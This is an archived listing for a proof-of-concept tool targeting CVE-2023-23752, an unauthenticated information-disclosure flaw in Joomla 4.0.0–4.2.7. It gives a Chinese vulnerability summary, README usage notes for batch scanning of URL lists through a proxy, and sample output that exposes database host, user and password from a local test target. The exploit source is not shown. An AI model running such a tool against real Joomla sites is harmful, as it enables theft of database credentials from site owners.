Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-23752 PoC — Joomla 安全漏洞

Source
Associated Vulnerability
Title:Joomla 安全漏洞 (CVE-2023-23752)
Description:Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla 4.0.0版本至4.2.7版本存在安全漏洞,该漏洞源于不正确的访问检查,允许对web服务端点进行未经授权的访问。
Description
CVE-2023-23752 Joomla Unauthenticated Information Disclosure
Readme
# CVE-2023-23752
CVE-2023-23752 Joomla Unauthenticated Information Disclosure

## Description

+ 支持高并发检测
+ 将`url`写入`urls.txt`,只支持`http://ip:port & https://ip:port` 格式
+ 使用`-p`参数添加代理
+ Just run

## Usage

### Help

```powershell
.\CVE-2023-23752.exe -h

         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗███████╗██████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗╚════██║██╔════╝╚════██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝    ██╔╝███████╗ █████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝  ╚═══██╗   ██╔╝ ╚════██║██╔═══╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗██████╔╝   ██║  ███████║███████╗
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚═════╝    ╚═╝  ╚══════╝╚══════╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note:CVE-2023-23752 Joomla Unauthenticated Information Disclosure
        @Warn: 代码仅供学习使用,请勿用于其他用途

Usage of CVE-2023-23752.exe:
  -p string
        Proxy Url
```

### Run

```powershell
.\CVE-2023-23752.exe

         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗███████╗██████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗╚════██║██╔════╝╚════██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝    ██╔╝███████╗ █████╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝  ╚═══██╗   ██╔╝ ╚════██║██╔═══╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗██████╔╝   ██║  ███████║███████╗
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚═════╝    ╚═╝  ╚══════╝╚══════╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note:CVE-2023-23752 Joomla Unauthenticated Information Disclosure
        @Warn: 代码仅供学习使用,请勿用于其他用途

2023-12-13 11:24:14 WARN Target: http://127.0.0.1:8080
2023-12-13 11:24:14 INFO Dbtype: mysqli
2023-12-13 11:24:14 INFO Host: joomladb
2023-12-13 11:24:14 INFO User: root
2023-12-13 11:24:14 INFO Password: example
2023-12-13 11:24:14 INFO Dbprefix: dm2vs_
```

File Snapshot

[4.0K] /data/pocs/ce5c55753abc67e688c22beef45e0ae3acdbc576 ├── [5.5K] CVE-2023-23752.go ├── [ 722] go.mod ├── [6.9K] go.sum ├── [1.0K] LICENSE ├── [4.5K] README.md └── [ 44] urls.txt 0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.